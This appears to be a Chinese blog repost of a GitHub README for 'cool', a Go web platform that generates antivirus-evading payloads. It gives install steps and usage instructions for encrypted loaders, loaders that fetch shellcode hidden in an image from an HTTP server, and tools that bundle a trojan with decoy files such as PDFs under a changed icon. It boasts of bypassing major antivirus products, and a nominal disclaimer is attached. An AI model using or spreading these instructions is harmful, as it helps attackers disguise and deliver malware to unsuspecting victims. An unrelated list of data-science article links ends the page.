Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
2023-03-20 15:38:59 时间
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。
cool
时间线:
- Golang Gin 框架写的免杀平台- (2021.11.12)
- Golang Gin 框架写的免杀平台,更新捆绑免杀- (2021.11.20)
- 增加自定义捆绑,修复一个小bug- (2021.11.22)
- 上传"compile.exe_备份",在serviceexecutable下,如果生成免杀是0kb的话就把原来的compile.exe删掉,把"compile.exe_备份"改成compile.exe,这样的话混淆效果会变差。。。但是至少能用了-(2021.11.25)
安装
- 安装Go环境,版本要1.17及以上;
- 如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
- go env -w GO111MODULE=on
- go env -w GOPROXY=https://goproxy.io,direct
- 完毕后执行 go install mvdan.cc/garble@latest ;
- 下载本项目到D盘根目录,文件夹名字改为cool;
- 运行cool.exe;
- 访问 http://127.0.0.1:9000 。
使用
为减去浏览器扫描的时间,故生成的文件格式为txt,使用时只需要把后缀修改为前端提示的后缀就可以了。
1. 加密1
- 直接执行exe。
2. 加密2
- 直接执行exe。
3. 分离1(houqing)
- 用python起一个HTTP服务(python -m http.server 8080),
- 把图片放到起http服务的目录下,
- 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。
4. 分离2
上线方式1
- 用python起一个HTTP服务(python -m http.server 8080),
- 把图片放到起http服务的目录下,
- 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。
上线方式2
- 执行xxx.exe 参数为shellcode.txt里的内容 。
5. 捆绑上线
捆绑内置免杀马
- 填写信息(免杀方式、listeners或者shellcode等),
- 上传需要和木马捆绑的文件,
- 下载完毕后将后缀改为exe,
- 图标自行修改。
捆绑自定义木马
- 第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)
- 点击生成
目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。
声明:仅用于技术交流,请勿用于非法用途。
项目地址:https://github.com/Ed1s0nZ/cool
相关文章
- 一篇运维老司机的大数据平台监控宝典(2)-联通大数据集群平台监控体系详解
- 一篇运维老司机的大数据平台监控宝典(1)-联通大数据集群平台监控体系进程详解
- 空中换引擎 博时基金数字化转型经验谈
- 如何高效地学习编程语言
- 作为一名阿里巴巴数据分析大牛,送给学弟学妹的经验积分
- 为什么要学习R语言
- Hadoop大数据分析平台的介绍性讨论
- 最全面的Spring学习笔记
- 16个用于数据科学和机器学习的顶级平台
- 给有抱负的数据科学家的六条建议
- 如何做一枚合格的数据产品经理
- 除Kaggle外,还有哪些顶级数据科学竞赛平台
- 一个鲜为人知却可以保护隐私的训练方法:联合学习
- 干货 :送你12个关于数据科学学习的关键提示(附链接)
- 大数据行业有多少种工作岗位,各自的技能需求是什么?
- 中国移动研究院常耀斌:商用大数据平台的研发之路
- 这些数据科学家必备的技能,你拥有哪些?
- 自学成才的开发者有何优势和劣势?
- Gartner报告:正处于数据科学与机器学习工具 “大爆炸”的时代
- Ready Computing借助InterSystems IRIS医疗版为医疗机构提供具有高度互操作性和可扩展性的解决方案